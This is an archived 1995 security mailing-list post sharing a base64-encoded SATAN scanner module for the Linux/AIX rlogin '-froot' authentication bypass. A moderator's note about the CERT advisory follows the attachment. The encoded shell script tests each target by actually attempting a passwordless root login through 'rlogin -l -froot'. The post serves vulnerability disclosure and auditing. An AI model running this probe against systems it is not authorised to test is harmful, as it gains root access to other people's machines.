[223] in linux-security and linux-alert archive

home help back first fref pref prev next nref lref last post

Satan module for Linux/AIX rlogin -froot bug

daemon@ATHENA.MIT.EDU (Aleph One)
Wed Apr 26 18:19:46 1995

Date: Wed, 26 Apr 1995 14:58:36 -0500 (CDT)
From: Aleph One <aleph1@dfw.net>
To: bugtraq@fc.net
Cc: satan@fish.com, linux-security@tarsier.cv.nrao.edu

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

--1435141361-2986965-798926316=:11428
Content-Type: TEXT/PLAIN; charset=US-ASCII

Well, this is a small satan module I made as a quick hack to check
hosts that have rlogind running for the -froot bug. Drop it in
the bin directory in the satan diretory. You also need to modify
the rules/jobs and config/paths.sh files. Look in login.satan and it
will tell you waht to do. Also your rlogin may puke at the -froot
thinking its a switch and not a parameter to -f. In that case get
Linux rlogin and compile. I havent tried it again a bugy Linux box
yet but thats because I dont know of one. Anyway here it is.

a1


--1435141361-2986965-798926316=:11428
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="login.satan"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.SUN.3.90.950426145836.11428B@dfw.net>
Content-Description: satan login module

IyEvYmluL3NoDQojDQojIGxvZ2luLnNhdGFuIHYwLjUNCiMgdGVzdCBmb3Ig
bmFzdHkgLWZyb290IExpbnV4L0FJWCBybG9naW4vbG9naW4gYnVnLg0KIw0K
IyBUZXN0ZWQgYWdhaW5zdCBBSVguIE5vdCB0ZXN0ZWQgeWV0IGFnYWluc3Qg
TGludXguDQojIChDYW4ndCBmaW5kIGEgTGludXggYm94IHRoYXQgc3RpbGwg
aGFzIHRoZSBidWcpDQojDQojIFRlc3RlZCB1bmRlciBMaW51eCBvbmx5LiBZ
b3VyIHJsb2dpbiBtYXkgY2hva2Ugb24gLWwgLWZyb290DQojIE1heSB0aGlu
ayAtZnJvb3QgaXMgYSBjb21tYW5kIGxpbmUgcGFyYW1ldGVyLiBHZXQgTGlu
dXgNCiMgcmxvZ2luIGFuZCBjb21waWxlLg0KIw0KIyBhZGQgdG8gY29uZmln
L3BhdGhzLnNoDQojCVJMT0dJTj0vdXNyL2Jpbi9ybG9naW4NCiMJU0xFRVA9
L3Vzci9iaW4vc2xlZXANCiMNCiMgYWRkIHRvIHJ1bGVzL3RvZG8NCiMJJHNl
cnZpY2UgZXEgImxvZ2luIiA8VEFCcz4gJHRhcmdldCAibG9naW4uc2F0YW4i
DQojDQojIEFsZXBoIE9uZQ0KIyBhbGVwaDFAZGZ3Lm5ldA0KIyBhbGVwaDFA
dW5kZXJncm91bmQub3JnDQojIGh0dHA6Ly91bmRlcmdyb3VuZC5vcmcvDQoN
Ci4gY29uZmlnL3BhdGhzLnNoDQoNCiMgdXNlZCBpbiBmaW5hbCBvdXRwdXQN
CnRhcmdldD0kMQ0Kc2VydmljZT1gJEJBU0VOQU1FICQwIHwgJFNFRCAncy9c
Li4qJC8vJ2ANCnN0YXR1cz0iYSINCg0KY2FzZSAkIyBpbg0KICAgIDEpIHRh
cmdldD0kMTs7DQogICAgKikgJEVDSE8gVXNhZ2U6ICQwIHRhcmdldCAxPiYy
OyBleGl0IDE7Ow0KZXNhYw0KDQojIG5lZWQgdGhlIEMgcHJvZ3JhbS9leGUg
dG8gZG8gdGhlIHJlYWwgd29yazoNCmlmICRURVNUICEgLWYgIiRSTE9HSU4i
IDsgdGhlbg0KCWV4aXQgMQ0KCWZpDQoNCmlmICggJFNMRUVQIDMwIDsgJEVD
SE8gfi4gKSB8ICRSTE9HSU4gLWwgLWZyb290ICR0YXJnZXQgMj4gL2Rldi9u
dWxsIHwgJEdSRVAgIkxhc3QgbG9naW4iID4gL2Rldi9udWxsIDsgdGhlbg0K
CXNldmVyaXR5PSJycyINCgl0cnVzdGVlPSJVU0VSQCR0YXJnZXQiDQoJdHJ1
c3RlZD0iQU5ZQEFOWSINCglzZXJ2aWNlX291dHB1dD0iTE9HSU4gYnVnIg0K
CXRleHQ9ImxvZ2luIC1mcm9vdCBpcyB2dWxuZXJhYmxlIHRvIHRoZSB3b3Js
ZCINCmVsc2UNCglzZXZlcml0eT0iIg0KCXRydXN0ZWU9IiINCgl0cnVzdGVk
PSIiDQoJc2VydmljZV9vdXRwdXQ9IiINCgl0ZXh0PSJsb2dpbiAtZnJvb3Qg
aXNuJ3QgdnVsbmVyYWJsZSINCglmaQ0KDQokRUNITyAiJHRhcmdldHwkc2Vy
dmljZXwkc3RhdHVzfCRzZXZlcml0eXwkdHJ1c3RlZXwkdHJ1c3RlZHwkc2Vy
dmljZV9vdXRwdXR8JHRleHQiDQoNCiMgdGhhdCdzIGFsbCBmb2xrcy4uLg0K

--1435141361-2986965-798926316=:11428--


[Mod: For those that may be late-comers to Linux, Linux (and AIX) shared
a particularly nasty hole for awhile in that you could log in (at the
console or remotely) using "-fusername" and not be prompted for a
password--this applied to the root account as well.  This problem was
announced in a CERT advisory (CA-94:09; May 23, 1994; message-id:
<9405231439.AA08522@delphi.cert.org>).  This is one of the most serious
security holes that has been publicly acknowledged in Linux since its
adoption in "mainstream" circles, though most networked systems, and all
major distributions, have since plugged this hole (as the author sort of
indicates).  --Jeff.]
home help back first fref pref prev next nref lref last post